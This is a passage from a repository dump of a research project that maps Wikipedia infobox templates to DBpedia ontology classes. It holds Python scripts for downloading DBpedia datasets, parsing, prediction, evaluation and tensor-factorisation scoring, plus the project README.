cols))\n\t_log.info(\"parsing complete\")\n\ndef tensor_factorization(lang, r, n_iter):\n\t_log.info(\"start factorization\")\n\tX = pkl_utils._load(config.TENSOR[lang])\n\t_log.info(\"data loading complete\")\n\tA, R, _, _, _ = rescal_als(X, r, maxIter=n_iter, lambda_A=10, lambda_R=10, compute_fit=False)\n\tdata_output = {'A':A, 'R':R}\n\tpkl_utils._save(config.RESCAL_OUTPUT[lang], data_output)\n\t_log.info(\"factorization complete\")\n\ndef compute_scores(A, R, ss, ps, os):\n\treturn np.array([\n\t\tnp.dot(A[ss[i], :], np.dot(R[ps[i]], A[os[i], :].T))\n\t\tfor i in range(len(ss))\n\t])\n\ndef main(options):\n\tlang = options.lang\n\tfin = options.fin\n\tfout = options.fout\n\tp = options.parse\n\tt = options.train\n\tr = options.r\n\tn_iter = options.i\n\n\tif p:\n\t\tparse(lang)\n\tif t:\n\t\ttensor_factorization(lang, r, n_iter)\n\t\n\tentityDict = pkl_utils._load(config.ENTITY[lang])\n\tpredicateDict = pkl_utils._load(config.PREDICATE[lang])\n\ttf = pkl_utils._load(config.RESCAL_OUTPUT[lang])\n\tA = tf[\"A\"]\n\tR = tf[\"R\"]\n\tdf = pd.read_csv(fin, names=[\"s\", \"p\", \"o\"])\n\tdf[\"s\"] = df[\"s\"].map(entityDict)\n\tdf[\"p\"] = df[\"p\"].map(predicateDict)\n\tdf[\"o\"] = df[\"o\"].map(entityDict)\n\tscores = compute_scores(A, R, list(df[\"s\"]), list(df[\"p\"]), list(df[\"o\"]))\n\tpd.DataFrame(scores).to_csv(fout, index=False, header=False)\n\n\nif __name__ == \"__main__\":\n\tparser = OptionParser()\n\toptions, args = parse_args(parser)\n\tmain(options)\n" }, { "alpha_fraction": 0.6595744490623474, "alphanum_fraction": 0.664893627166748, "avg_line_length": 19.88888931274414, "blob_id": "d43a4050bf06fb4e372ec3d440c0828fe9c080da", "content_id": "77934a987cd667339df4659f59d3d0c4c4cdeee0", "detected_licenses": [ "Apache-2.0" ], "is_generated": 
false, "is_vendor": false, "language": "Python", "length_bytes": 188, "license_type": "permissive", "max_line_length": 36, "num_lines": 9, "path": "/Code/utils/pkl_utils.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import pickle\n\ndef _save(fname, data, protocal=-1):\n\twith open(fname, \"wb\") as f:\n\t\tpickle.dump(data, f, protocal)\n\ndef _load(fname):\n\twith open(fname, \"rb\") as f:\n\t\treturn pickle.load(f)\n" }, { "alpha_fraction": 0.7506293058395386, "alphanum_fraction": 0.7573418617248535, "avg_line_length": 64.48351287841797, "blob_id": "54ccf1a947b183a3f5f5e5503dda9c7fb887542e", "content_id": "d197518f85880ed0091b9ebc32cd3386cd92c9e1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5959, "license_type": "permissive", "max_line_length": 404, "num_lines": 91, "path": "/README.md", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "# mappings-autogeneration\n\n### Template Mapping\n\nGiven a Wikipedia template, our goal is to map it to a DBpedia ontology class when possible. The approach is instance-based: exploit the Wikipedia pages (instances) already mapped with a DBpedia class and their cross language links to the pages that the template to be mapped. A simple method based on the frequencies of the resulting classes allows us to tune the tradeoff between precision and recall. \n\n![Alt](/Images/figure1.png)\n\nThe mapping algorithm is summaried in the above figure and implemented as follows:\n\n- Given as input infobox taken from a version of Wikipedia in a specific language, we collect all the page that include this infobox.\n- Use the cross-language links to retrieve the pages in the selected pivot languages, for which we know the DBpedia classes.\n- Collect the DBpedia classes of these pages and count their number of occurrences.\n- The input infobox is then mapped to the most frequent class. A parameter **L** between 0 and 1 is used to filter the class whose frequency is less than **L**. In addition, we ignore the infox whose occurrence **C** is too small, like less than **C** = 10.\n\n### Use Information from Wikidata \n\nQuite a bit entities in wikidata has a DBpedia ontology types assigned already. In addition, we have links between wikidata and other languages. As a result, we can treat wikidata as a pivot language directly. The information from wikidata can be useful to improve the performance of our approach. \n\n### Class Assignment\n\nDBpedia stores the cross-language information, but it's not used to map the infoboxes. For example, Clint Eastwood is classified as **Actor** in the French and as **Person** in the Italian one. As a result, we need to find a strategy to classify pages in all languages to the most specific class. The strategy is defined as follows:\n\n- If the page belongs to more than one ontology class, the lowest common ancestor of these classes is assigned.\n- In the above case, if the classes are connected in a chain of subclass of relations, we consider the most specific class.\n\n### Source Code and Usage\n\nThe source codes are all stored in the **Code** directory.\n\n- ```config.py``` defines the paths and parameters in the program. 
Modify it to fit your own environment if necessary.\n- ```download.py``` can download the needed datasets for a specified language.\n- ```parse.py``` transforms the given data into the entity matrix, given the target language and the pivot language, see **Example** for details.\n- ```predict.py``` gives predicted mapping for the target language based on the given pivot languaes. With option \"-e\", it can also calculate the precision and recall of the target language based on the existing mapping on DBpedia.\n- ```workflow.py``` combine all the above modules together. You can simply run this script to conduct the whole workflow including download, parse, predict and evaluate. \n\n### Example\n\nAfter use ```parse.py```, we can get a matrix as follows for the given target language and pivot language:\n\ntemplate_zh | article_zh | template_en | article_en | class\n:---------: | :--------: | :---------: | :--------: | :---:|\nAuthority_control | Slackware | Infobox_OS | Slackware | Software \nAuthority_control | OpenSUSE | Authority_control | OpenSUSE | owl#Thing\nAuthority_control | FreeBSD | Infobox_OS | FreeBSD | Software\n\n### Experiments\n\nIn the experiments, we exploits existing handcrafted mappings in six languages (English, Italian, German, Portuguese, Spanish, French). Experiments have benn carried out on 5 languages (Bulgarian, Czech, Indonesian, Dutch and Catalan).\n\nPrecision and recall values are calculated using existing mappings from DBpedia official mapping website as gold standard.\n\nFor Bulgarian, we have the following results (The results are stored in these files: [data_without_wikidata](/Plot/data_without_wikidata.csv) and [data_with_wikidata](/Plot/data_with_wikidata.csv))\n\n![Alt](/Plot/figure1.png)\n\n### Case Study\n\nWhen **L** is 0.5, **C** is 10, there are five miss classified cases in Bulgarian:\n\nlabel | predict | LCA\n:---- | :------ | :--\nFilm | Actor | owl#Thing\nPlace | AdministrativeRegion | Place\nPerson | Writer | Person\nSettlement | Village | Settlement\nFormulaOneRacing | GrandPrix | owl#Thing\n\nFrom which, we can find that there are 3 out of 5 cases that the predicted class is a subclass of the labeled class. In the current evaluation metric, we treat them as false positives which is not that accurate. As a result, we'd better propose a better evaluation metric.\n\n### High-quality Output Mappings for Chinese\n\nSetting **L** as 0.9 and **C** as 100, I get 501 mappings for Chinese. After manual checking, I filter out 456 high-quality mappings as output of the project, which can be found in [this file](/Output/predicted/zh.csv). \n\n### Tensor Factorization on DBpedia\n\n![Alt](/Images/RESCAL.png)\n\nUsing ideas in [Factorizing YAGO](http://www.dbs.ifi.lmu.de/~tresp/papers/p271.pdf), the script ```factorization.py``` can compute a score for given triples indicating the likelihood of the existance of the triples.\n\nGiven input like [this file](/Code/input.csv), we can get an output like [this file](/Code/output.csv). 
We can use the score to help determine whether to add some triples to DBpedia.\n\nIn order to use this script, the package [RESCAL](https://github.com/mnick/rescal.py) needs to be installed first.\n\n### Graph Embeddings on DBpedia\n\n![Alt](/Images/HOLE.png)\n\nUsing ideas in [Holographic Embeddings of Knowledge Graphs](http://arxiv.org/pdf/1510.04935.pdf) and [Translating Embeddings for Modeling Multi-relational Data](http://papers.nips.cc/paper/5071-translating-embeddings-for-modeling-multi-relational-data.pdf), the script ```hole.py``` can compute a score for given triples just like ```factorization.py``` mentioned above.\n\nIn order to use this script, the package [scikit-kge](https://github.com/mnick/scikit-kge) needs to be installed first.\n" }, { "alpha_fraction": 0.6447368264198303, "alphanum_fraction": 0.6866028904914856, "avg_line_length": 29.962963104248047, "blob_id": "3871b7ca7bde935eb3d146ec2e38d40d6862533f", "content_id": "fc13c04a3dc1f74f62a4781718469347c82f9cfb", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 836, "license_type": "permissive", "max_line_length": 76, "num_lines": 27, "path": "/Plot/plot.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport pandas as pd\n\nd1 = pd.read_csv(\"data_without_wikidata.csv\")\nd2 = pd.read_csv(\"data_with_wikidata.csv\")\n\ngrid_size = (2, 1)\nplt.subplot2grid(grid_size, (0, 0), rowspan=1, colspan=1)\nplt.plot(d1[\"L\"], d1[\"precision\"], marker=\"o\", label=\"without wikidata\")\nplt.plot(d2[\"L\"], d2[\"precision\"], marker=\"o\", label=\"with wikidata\")\nplt.ylabel('Precision')\nplt.xlim(0.1, 0.9)\nplt.grid(True)\nplt.legend(loc=2)\n\nplt.subplot2grid(grid_size, (1, 0), rowspan=1, colspan=1)\nplt.plot(d1[\"L\"], d1[\"recall\"], marker=\"o\", label=\"without wikidata\")\nplt.plot(d2[\"L\"], d2[\"recall\"], marker=\"o\", label=\"with wikidata\")\nplt.ylabel('Recall')\nplt.xlabel('L')\nplt.xlim(0.1, 0.9)\nplt.grid(True)\nplt.legend()\n\nplt.suptitle(\"Performance on bulgarian given 6 pivot languages with C = 10\")\n#plt.show()\nplt.savefig('figure1.png')\n" }, { "alpha_fraction": 0.6483292579650879, "alphanum_fraction": 0.6515892148017883, "avg_line_length": 34.05714416503906, "blob_id": "4600c8b9a888ce2275611a51f8d723cd3f14dcce", "content_id": "3b57931d60e1869fedce4f99866b3d9610113e76", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2454, "license_type": "permissive", "max_line_length": 129, "num_lines": 70, "path": "/Code/workflow.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import os\nfrom optparse import OptionParser\nimport config\n\ndef parse_args(parser):\n\tparser.add_option(\"-l\", \"--lang\", default=\"zh\", type=\"string\", dest=\"lang\", help=\"target language\")\n\tparser.add_option(\"-p\", \"--pivot\", default=\"en\", type=\"string\", dest=\"pivots\", help=\"pivot languages\")\n\tparser.add_option(\"-L\", default=0.5, type=\"float\", dest=\"L\", help=\"parameter to tune the tradeoff between precision and recall\")\n\tparser.add_option(\"-C\", default=10, type=\"int\", dest=\"C\", help=\"minimum occurrence of an infobox\")\n\tparser.add_option(\"-e\", default=False, action=\"store_true\", dest=\"evaluate\", help=\"evaluate the predicted mapping\")\n\t(options, args) = parser.parse_args()\n\treturn options, args\n\ndef main(options):\n\tlang = 
options.lang\n\tpivots = options.pivots.split(\"|\")\n\tL = options.L\n\tC = options.C\n\tflag = options.evaluate\n\n\tif not os.path.isdir(config.DATA_DIR + \"/mapping\"):\n\t\tcmd = \"mkdir %s\" % (config.DATA_DIR + \"/mapping\")\n\t\tos.system(cmd)\n\tif not os.path.isdir(config.DATA_DIR + \"/article\"):\n\t\tcmd = \"mkdir %s\" % (config.DATA_DIR + \"/article\")\n\t\tos.system(cmd)\n\tif not os.path.isdir(config.DATA_DIR + \"/link\"):\n\t\tcmd = \"mkdir %s\" % (config.DATA_DIR + \"/link\")\n\t\tos.system(cmd)\n\n\tcmd = \"python download.py -l %s\" % lang\n\tos.system(cmd)\n\n\tfor pivot in pivots:\n\t\tcmd = \"python download.py -l %s\" % pivot\n\t\tos.system(cmd)\n\n\tif not os.path.isdir(config.OUTPUT_DIR + \"/template2article\"):\n\t\tcmd = \"mkdir %s\" % (config.OUTPUT_DIR + \"/template2article\")\n\t\tos.system(cmd)\n\tif not os.path.isdir(config.OUTPUT_DIR + \"/article2template\"):\n\t\tcmd = \"mkdir %s\" % (config.OUTPUT_DIR + \"/article2template\")\n\t\tos.system(cmd)\n\tif not os.path.isdir(config.OUTPUT_DIR + \"/link\"):\n\t\tcmd = \"mkdir %s\" % (config.OUTPUT_DIR + \"/link\")\n\t\tos.system(cmd)\n\tif not os.path.isdir(config.OUTPUT_DIR + \"/mapping\"):\n\t\tcmd = \"mkdir %s\" % (config.OUTPUT_DIR + \"/mapping\")\n\t\tos.system(cmd)\n\tif not os.path.isdir(config.OUTPUT_DIR + \"/matrix\"):\n\t\tcmd = \"mkdir %s\" % (config.OUTPUT_DIR + \"/matrix\")\n\t\tos.system(cmd)\n\tif not os.path.isdir(config.OUTPUT_DIR + \"/predicted\"):\n\t\tcmd = \"mkdir %s\" % (config.OUTPUT_DIR + \"/predicted\")\n\t\tos.system(cmd)\n\t\n\tfor pivot in pivots:\n\t\tcmd = \"python parse.py -l %s -p %s\" % (lang, pivot)\n\t\tos.system(cmd)\n\t\n\tcmd = \"python predict.py -l %s -p \\\"%s\\\" -L %f -C %d\" % (lang, options.pivots, L, C)\n\tif flag:\n\t\tcmd += \" -e\"\n\tos.system(cmd)\n\n\nif __name__ == \"__main__\":\n\tparser = OptionParser()\n\toptions, args = parse_args(parser)\n\tmain(options)\n" }, { "alpha_fraction": 0.78125, "alphanum_fraction": 0.78125, "avg_line_length": 31, "blob_id": "5e27a6aff2dcc3cc441e33c64f628e36cc2656f5", "content_id": "d1e073f04eeae947ea7edc84d7e06ee99f9deb73", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 32, "license_type": "permissive", "max_line_length": 31, "num_lines": 1, "path": "/Output/README.md", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "# Directory to store the output\n" }, { "alpha_fraction": 0.6555555462837219, "alphanum_fraction": 0.6694444417953491, "avg_line_length": 23.225807189941406, "blob_id": "880ddd339cd4c2a32b3fc563709b15afd6e43883", "content_id": "ae9cc79dbeaa5373141bafb7ccc914ab8122aaac", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 720, "license_type": "permissive", "max_line_length": 75, "num_lines": 31, "path": "/Code/ontology.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import config\nfrom utils import time_utils, pkl_utils\nimport rdflib.graph as g\n\ndef main():\n\tprint \"[%s]: generate ontology hierarchy tree\" % (time_utils._timestamp())\n\tG = g.Graph()\n\tG.parse(config.ONTOLOGY, format=\"n3\")\n\n\tq = '''\nPREFIX rr: <http://www.w3.org/2000/01/rdf-schema#>\n\nSELECT ?child ?parent\nWHERE {\n\t?child rr:subClassOf ?parent .\n}'''\n\t\n\tresults = G.query(q)\n\tontologyDict = {}\n\tfor row in results:\n\t\tchild = str(row[0])\n\t\tparent = str(row[1])\n\t\tif parent in 
ontologyDict:\n\t\t\tontologyDict[parent].append(child)\n\t\telse:\n\t\t\tontologyDict[parent] = [child,]\n\tpkl_utils._save(config.ONTOLOGY_TREE, ontologyDict)\n\tprint \"[%s]: generation complete\" % time_utils._timestamp()\n\nif __name__ == \"__main__\":\n\tmain()\n" }, { "alpha_fraction": 0.6612903475761414, "alphanum_fraction": 0.6612903475761414, "avg_line_length": 19.66666603088379, "blob_id": "b063d21a1e780f09b184d6b1d17d26334fa95e3d", "content_id": "30419f96343cc7936e0285d3e683814d005a111f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 124, "license_type": "permissive", "max_line_length": 41, "num_lines": 6, "path": "/Code/utils/time_utils.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import datetime\n\ndef _timestamp():\n\tnow = datetime.datetime.now()\n\tnow_str = now.strftime(\"%Y-%m-%d-%H-%M\")\n\treturn now_str\n" }, { "alpha_fraction": 0.5233786106109619, "alphanum_fraction": 0.5716440677642822, "avg_line_length": 23.481481552124023, "blob_id": "b4aa883f7983ec86fd024dd1ec94d3fe22f511af", "content_id": "b832c614c9b4a2f187c07f02c11cfc693332e743", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 663, "license_type": "permissive", "max_line_length": 96, "num_lines": 27, "path": "/Code/experiment.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import os\nimport pandas as pd\n\ndef main():\n\tlang = \"bg\"\n\tpivots = \"en|de|it|fr|pt|es\"\n\tC = 10\n\tLs = [0.1, 0.3, 0.5, 0.7, 0.9]\n\t#L = 0.5\n\t#Cs = [10, 20, 30, 50, 100]\n\tPs = []; Rs = []\n\tfor L in Ls:\n\t\tcmd = \"python workflow.py -l %s -p \\\"%s\\\" -L %f -C %d -e -w > test.txt\" % (lang, pivots, L, C)\n\t\tos.system(cmd)\n\t\tinfile = open(\"test.txt\")\n\t\tcontents = infile.readlines()\n\t\tprecision = float(contents[6][11:].strip())\n\t\trecall = float(contents[7][11:].strip())\n\t\tprint precision, recall\n\t\tPs.append(precision)\n\t\tRs.append(recall)\n\tdf = pd.DataFrame({\"L\":Ls, \"precision\":Ps, \"recall\":Rs})\n\tdf.to_csv(\"data4.csv\", index=False)\n\n\nif __name__ == \"__main__\":\n\tmain()\n\n\n" }, { "alpha_fraction": 0.6364883184432983, "alphanum_fraction": 0.6554641127586365, "avg_line_length": 28.958904266357422, "blob_id": "eef7ce4346b22ab87e424bbdc91b2eed3433fb22", "content_id": "294e3686f7f5ab52523868e2feab43d2bef4ab3d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4374, "license_type": "permissive", "max_line_length": 129, "num_lines": 146, "path": "/Code/predict.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import config\nimport pandas as pd\nfrom utils import time_utils, pkl_utils\nfrom optparse import OptionParser\nfrom collections import defaultdict\nimport os.path\nimport parse\n\nG = pkl_utils._load(config.ONTOLOGY_TREE)\nRoot = \"http://www.w3.org/2002/07/owl#Thing\"\n\ndef parse_args(parser):\n\tparser.add_option(\"-l\", \"--lang\", default=\"zh\", type=\"string\", dest=\"lang\", help=\"target language\")\n\tparser.add_option(\"-p\", \"--pivot\", default=\"en\", type=\"string\", dest=\"pivots\", help=\"pivot languages\")\n\tparser.add_option(\"-L\", default=0.5, type=\"float\", dest=\"L\", help=\"parameter to tune the tradeoff between precision and recall\")\n\tparser.add_option(\"-C\", default=10, type=\"int\", dest=\"C\", help=\"minimum occurrence of 
an infobox\")\n\tparser.add_option(\"-e\", default=False, action=\"store_true\", dest=\"evaluate\", help=\"evaluate the predicted mapping\")\n\t(options, args) = parser.parse_args()\n\treturn options, args\n\ndef lca(root, e1, e2):\n\tif (root == e1) or (root == e2):\n\t\treturn root\n\tif not G.has_key(root):\n\t\treturn 0\n\tnodeList = []\n\tfor child in G[root]:\n\t\tnode = lca(child, e1, e2)\n\t\tif node != 0:\n\t\t\tnodeList.append(node)\n\tif len(nodeList) > 1:\n\t\treturn root\n\telif len(nodeList) == 1:\n\t\treturn nodeList[0]\n\telse:\n\t\treturn 0\n\ndef isin(root, node):\n\tif root == node:\n\t\treturn True\n\tif not G.has_key(root):\n\t\treturn False\n\tflag = False\n\tfor child in G[root]:\n\t\tflag |= isin(child, node)\n\treturn flag\n\ndef assign2(t1, t2):\n\tif t1 == config.MISSING_VALUE_STRING:\n\t\treturn t2\n\tif t2 == config.MISSING_VALUE_STRING:\n\t\treturn t1\n\tif t1 == t2:\n\t\treturn t1\n\tans = lca(Root, t1, t2)\n\tif ans == t1:\n\t\treturn t2\n\tif ans == t2:\n\t\treturn t1\n\tif ans == 0:\n\t\tprint t1, t2\n\t\tprint isin(Root, t1), isin(Root, t2)\n\t\tprint G.has_key(t1), G.has_key(t2)\n\treturn ans\n\ndef assign(typeString):\n\ttypes = typeString.split(\"\\t\")\n\tans = assign2(types[0], types[1])\n\tfor t in types[2:]:\n\t\tans = assign2(ans, t)\n\treturn ans\n\ndef main(options):\n\tlang = options.lang\n\tpivots = options.pivots.split(\"|\")\n\tL = options.L\n\tC = options.C\n\tflag = options.evaluate\n\tprint \"[%s]: predict the mapping for language %s\" % (time_utils._timestamp(), lang)\n\n\tdrop_columns = [\"template2\", \"article2\"]\n\tdfList = []\n\tfor pivot in pivots:\n\t\tdf = pd.read_csv(config.ENTITY_MATRIX[\"%s2%s\" % (lang, pivot)])\n\t\tdf = df.drop(drop_columns, axis=1)\n\t\tdf = df.rename(columns={\"ontology\":pivot})\n\t\tdfList.append(df)\n\tdf = dfList[0]\n\tfor df0 in dfList[1:]:\n\t\tdf = pd.merge(df, df0, on=[\"article1\", \"template1\"], how=\"outer\")\n\t#print df.shape[0]\n\tmsk = df[pivots[0]].notnull()\n\tfor pivot in pivots[1:]:\n\t\tmsk |= df[pivot].notnull()\n\tdf = df[msk]\n\tdf = df.fillna(config.MISSING_VALUE_STRING)\n\tdf[\"str\"] = df[pivots[0]]\n\tfor pivot in pivots[1:]:\n\t\tdf[\"str\"] = df[\"str\"] + \"\\t\" + df[pivot]\n\tdf[\"ontology\"] = df[\"str\"].apply(assign)\n\tgrouped = df.groupby(\"template1\")\n\ttemplate = []; ontology = []; occurrence = []; frequency = []\n\tfor name, group in grouped:\n\t\tclassDict = defaultdict(int)\n\t\tfor o in group[\"ontology\"]:\n\t\t\tclassDict[o] += 1\n\t\tN = group.shape[0]\n\t\tc = sorted(classDict, key=classDict.get, reverse=True)[0]\n\t\ttemplate.append(name)\n\t\tontology.append(c)\n\t\toccurrence.append(N)\n\t\tfrequency.append(1.0*classDict[c]/N)\n\tdata = {\"template\":template, \"ontology\":ontology, \"occurrence\":occurrence, \"frequency\":frequency}\n\tres = pd.DataFrame(data)\n\tmsk = (res[\"occurrence\"] > C) & (res[\"frequency\"] > L)\n\tres = res[msk]\n\tres.to_csv(config.MAPPED_INFOBOX[lang], index=False)\n\tprint \"[%s]: prediction complete complete\" % time_utils._timestamp()\n\n\tif flag:\n\t\tif not os.path.isfile(config.EXISTING_MAPPING_OUTPUT[lang]):\n\t\t\tparse.getExistingMapping(lang=lang)\n\t\tprint \"[%s]: evaluate the predicted mapping\" % time_utils._timestamp()\n\t\tmapping = pd.read_csv(config.EXISTING_MAPPING_OUTPUT[lang], index_col=\"template\")\n\t\tTP = 0 ; FP = 0\n\t\tfor t, o in zip(res[\"template\"], res[\"ontology\"]):\n\t\t\tif t in mapping.index:\n\t\t\t\tlabel = mapping.loc[t, \"ontology\"]\n\t\t\t\tancestor = lca(Root, o, 
label)\n\t\t\t\tif (o == label) or (o == ancestor):\n\t\t\t\t\tTP += 1\n\t\t\t\telse:\n\t\t\t\t\tFP += 1\n\t\tM = mapping.shape[0]\n\t\tprint \"True positives: %d\" % TP\n\t\tprint \"False positives: %d\" % FP\n\t\tprint \"False negatives: %d\" % (M-TP)\n\t\tprint \"precision: %.3f\" % (1.0*TP/(TP + FP))\n\t\tprint \"recall: %.3f\" % (1.0*TP/M)\n\n\t\tprint \"[%s]: evaluation complete\" % time_utils._timestamp()\n\nif __name__ == \"__main__\":\n\tparser = OptionParser()\n\toptions, args = parse_args(parser)\n\tmain(options)\n" }, { "alpha_fraction": 0.6837739944458008, "alphanum_fraction": 0.6951788663864136, "avg_line_length": 43.86046600341797, "blob_id": "b8ab1e28969469c1e88eb3fa8a547e53ca14bd2d", "content_id": "45a6b1d3897246002b1ddbe7d4c4c7f8fc52d7ac", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1929, "license_type": "permissive", "max_line_length": 148, "num_lines": 43, "path": "/Code/download.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import config\nimport os\nfrom optparse import OptionParser\n\ndef parse_args(parser):\n\tparser.add_option(\"-l\", \"--lang\", default=\"en\", type=\"string\", dest=\"lang\", help=\"specify the language to download\")\n\t#parser.add_option(\"-m\", \"--mapping\", default=True, action=\"store_false\", dest=\"mapping\", help=\"don't download dataset for existing mappings\")\n\t#parser.add_option(\"-a\", \"--article\", default=True, action=\"store_false\", dest=\"article\", help=\"don't download dataset for article template links\")\n\t#parser.add_option(\"-i\", \"--inter\", default=True, action=\"store_false\", dest=\"inter\", help=\"don't download dataset for interlanguage links\")\n\t(options, args) = parser.parse_args()\n\treturn options, args\n\ndef main(options):\n\tlang = options.lang\n\t#mapping = options.mapping\n\t#article = options.article\n\t#inter = options.inter\n\n\t# Download dataset for existing mappings\n\tif not os.path.isfile(config.EXISTING_MAPPING[lang]):\n\t\tcmd = \"wget -P %s http://mappings.dbpedia.org/server/mappings/%s/pages/rdf/all\" % (config.DATA_DIR + \"/mapping/\", lang)\n\t\tos.system(cmd)\n\t\tcmd = \"mv %s %s\" % (config.DATA_DIR + \"/mapping/all\", config.EXISTING_MAPPING[lang])\n\t\tos.system(cmd)\n\n\t# Download dataset for article template links\n\tif not os.path.isfile(config.ARTICLE_TEMPLATES[lang]):\n\t\tcmd = \"wget -P %s http://downloads.dbpedia.org/2015-10/core-i18n/%s/article_templates_%s.ttl.bz2\" % (config.DATA_DIR + \"/article/\", lang, lang)\n\t\tos.system(cmd)\n\t\tcmd = \"bunzip2 %s\" % (config.ARTICLE_TEMPLATES[lang] + \".bz2\")\n\t\tos.system(cmd)\n\n\t# Download dataset for interlanguage links\n\tif not os.path.isfile(config.ILL[lang]):\n\t\tcmd = \"wget -P %s http://downloads.dbpedia.org/2015-10/core-i18n/%s/interlanguage_links_%s.ttl.bz2\" % (config.DATA_DIR + \"/link/\", lang, lang)\n\t\tos.system(cmd)\n\t\tcmd = \"bunzip2 %s\" % (config.ILL[lang] + \".bz2\")\n\t\tos.system(cmd)\n\nif __name__ == \"__main__\":\n\tparser = OptionParser()\n\toptions, args = parse_args(parser)\n\tmain(options)\n" }, { "alpha_fraction": 0.6579894423484802, "alphanum_fraction": 0.6725925803184509, "avg_line_length": 32.2746467590332, "blob_id": "046b62ab6fd771c2ee813dd29f33f9bf045a2d06", "content_id": "da10b012c8a42cbbf1656f00de536e733cabc1e5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4725, "license_type": "permissive", 
"max_line_length": 120, "num_lines": 142, "path": "/Code/hole.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import numpy as np\nimport scipy.sparse as spsp\nimport pandas as pd\nfrom rescal import rescal_als\nimport config\nfrom optparse import OptionParser\nfrom utils import time_utils, pkl_utils\nimport os\n\nimport logging\nlogging.basicConfig(level=logging.INFO)\n_log = logging.getLogger('Tensor Factorization for DBpedia')\n\ndef parse_args(parser):\n\tparser.add_option(\"-l\", \"--lang\", default=\"en\", type=\"string\", dest=\"lang\", help=\"specify the language\")\n\tparser.add_option(\"-p\", \"--parse\", default=False, action=\"store_true\", dest=\"parse\", help=\"enable the parsing module\")\n\tparser.add_option(\"-t\", \"--train\", default=False, action=\"store_true\", dest=\"train\", help=\"enable the training module\")\n\tparser.add_option(\"-c\", \"--ncomp\", default=150, type=\"int\", dest=\"ncomp\", help=\"number of components\")\n\tparser.add_option(\"-e\", \"--me\", default=500, type=\"int\", dest=\"me\", help=\"maximum epoches\")\n\tparser.add_option(\"--fin\", type=\"string\", dest=\"fin\", help=\"the path of input file\")\n\tparser.add_option(\"--fout\", type=\"string\", dest=\"fout\", help=\"the path of output file\")\n\t(options, args) = parser.parse_args()\n\treturn options, args\n\ndef parse(lang=\"en\"):\n\tdataDict = {}\n\t\n\tinfile = open(config.INSTANCE_TYPES[lang])\n\trdf_type = \"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\"\n\ttype_entries = []\n\tentitySet = set()\n\ttypeSet = set()\n\tfor line in infile.readlines():\n\t\tif line[0] != \"<\":\n\t\t\tcontinue\n\t\trow = line.split()\n\t\tinstance = row[0][1:-1]\n\t\tontology = row[2][1:-1]\n\t\ttype_entries.append((instance, ontology))\n\t\tentitySet.add(ontology)\n\t\ttypeSet.add(ontology)\n\ttypeDict = {y:x for x, y in enumerate(typeSet)}\n\tinfile.close()\n\n\tcnt_type = len(entitySet)\n\t_log.info(\"%d types\" % cnt_type)\n\n\tinfile = open(config.OBJECTS[lang])\n\trelationDict = {}\n\tinstanceSet = set()\n\tfor line in infile.readlines():\n\t\tif line[0] != \"<\":\n\t\t\tcontinue\n\t\trow = line.split()\n\t\tsubject = row[0][1:-1]\n\t\tpredicate = row[1][1:-1]\n\t\ttarget = row[2][1:-1]\n\t\tentitySet.add(subject)\n\t\tentitySet.add(target)\n\t\tinstanceSet.add(subject)\n\t\tinstanceSet.add(target)\n\t\tif predicate in relationDict:\n\t\t\trelationDict[predicate].append((subject, target))\n\t\telse:\n\t\t\trelationDict[predicate] = [(subject, target)]\n\tinstanceDict = {y:x for x, y in enumerate(instanceSet)}\n\tentityDict = {y:x for x, y in enumerate(entitySet)}\n\tinfile.close()\n\n\tcnt_ins = len(instanceSet)\n\tN = len(entitySet)\n\t_log.info(\"%d instanes\" % cnt_ins)\n\t_log.info(\"%d entites\" % N)\n\t\n\ttriples = []\n\tpredicateDict = {}\n\tcnt = 0\n\tfor predicate in relationDict:\n\t\tentries = relationDict[predicate]\n\t\tsub = [entityDict[entry[0]] for entry in entries]\n\t\tobj = [entityDict[entry[1]] for entry in entries]\n\t\tpred = [cnt for entry in entries]\n\t\ttriples.extend(zip(sub, obj, pred))\n\t\tpredicateDict[cnt] = predicate\n\t\tcnt += 1\n\ttype_entries = [entry for entry in type_entries if entry[0] in instanceSet]\n\tsub = [entityDict[entry[0]] for entry in type_entries]\n\tobj = [entityDict[entry[1]] for entry in type_entries]\n\tpred = [cnt for entry in type_entries]\n\ttriples.extend(zip(sub, obj, pred))\n\tpredicateDict[cnt] = rdf_type\n\ttriples = pd.Series(triples)\n\t_log.info(\"%d relations\" % (cnt+1))\n\t_log.info(\"%d 
